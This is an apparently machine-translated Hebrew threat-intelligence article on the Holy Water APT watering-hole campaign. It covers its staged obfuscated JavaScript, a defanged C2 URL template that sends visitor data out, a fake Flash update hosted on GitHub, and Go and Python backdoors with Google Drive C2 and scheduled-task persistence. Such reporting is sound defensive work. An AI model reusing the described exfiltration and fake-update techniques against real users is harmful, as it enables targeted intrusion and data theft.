מים קדושים APT

Holy Water APT הוא השם שניתן לקבוצה של פושעי סייבר שביצעו סדרה של התקפות מסוג חור מים נגד קבוצה דתית ואתנית אסייתית. לא ניתן לייחס את ה-TTP (טקטיקות, טכניקות ונהלים) של המתקפה הספציפית הזו לאף אחד משחקני ה-ATP (Advanced Persistent Threat) הידועים כבר, מה שהוביל את החוקרים למסקנה שמדובר בקבוצת פושעי סייבר חדשה שמציגה מאפיינים של צוות קטן וגמיש של האקרים.

כדי לבצע פיגוע בור מים, העבריינים מכוונים לכמה אתרים שבהם המטרות המיועדות מבקרים בתדירות גבוהה. האתרים יכולים להיות שייכים לארגונים, ארגוני צדקה או אנשים בעלי השפעה המשתייכים לקבוצת היעד. כל האתרים שנפרצו על ידי Holy Water התארחו באותו שרת וכללו בין היתר אישיות דתית, צדקה, תוכנית שירות התנדבותי וארגון סחר הוגן.

המתקפה כללה שלבים מרובים

בביקור באתר אינטרנט שנפרץ, המשתמש נכנס לשלב ההתקפה הראשון המורכב מ-JavaScript פגום בשם (script|jquery)-css.js ומעורפל עם Sojson, שירות אינטרנט מבוסס סיני. תפקידו של סקריפט זה הוא לקבוע אם המשתמש הוא יעד חוקי וכדי לעשות זאת, המטען מתחיל לגרד נתונים על המבקר ולשלוח אותם לשרת חיצוני בכתובת loginwebmailnic.dynssl[.]com באמצעות בקשות HTTP GET:

https://loginwebmailnic.dynssl[.]com/all/content.php?jsoncallback=&lanip=&wanip=&urlpath=&_=

התגובה מהשרת מחזירה תוצאה אמיתית או לא נכונה, ואם הערך נכון, השלב הבא של המתקפה מופעל; אחרת, שום דבר לא קורה.

במהלך השלב השני, JavaScript בשם (script|jquery)-file.js, אשר, שוב, מעורפל באותו אופן. עם זאת, הפעם ההאקרים השתמשו ב-Sojson v5 במקום v4. כדי להדביק את המשתמש, ה-Holy Water APT אינו מנצל פגיעות או חולשות תוכנה כלשהן. במקום זאת, נוצר חלון מוקפץ המציע עדכון לנגן פלאש והקורבן הפוטנציאלי צריך להסכים להוריד את הקובץ.

ארסנל הכלים של תוכנות זדוניות של Holy Water APT התארח ב-GitHub

אם המשתמש מאפשר לעדכון הפלאש המזויף להמשיך, הוא מתחבר למאגר GitHub שאינו פעיל יותר שנמצא בכתובת github.com/AdobeFlash32/FlashUpdate . ארבע קבוצות שונות של כלים אוחסנו במיקום זה - חבילת התקנה, תוכנה זדונית בדלת אחורית בשם החוקרים Godlike12 ושתי גרסאות של דלת אחורית בקוד פתוח של Python הידועה בשם Stitch , ששונו על ידי ההאקרים עם פונקציונליות מורחבת. חבילת העדכון היא מתקין NSIS שמפיל מתקין לגיטימי של Windows Flash Player וכלי stager המשמש לטעינת המטען בפועל. הדלת האחורית Godlike12 כתובה בשפת Go ומשמשת ליישום ערוץ Google Drive לשרתי Command and Control (C&C, C2). באשר לגרסאות הדלת האחורית של Stitch, בנוסף לפעילויות הרגילות של הדלת האחורית כגון איסוף מידע וסיסמאות, רישום פעילות, הורדת קבצים וכו', קבוצת Holy Water הוסיפה את היכולת להוריד תוכנית התקנת Adobe Flash לגיטימית, לעדכון אוטומטי עצמו מ-ubnrooters.serveuser.com ולהשיג התמדה על ידי מינוף משימות מתוזמנות.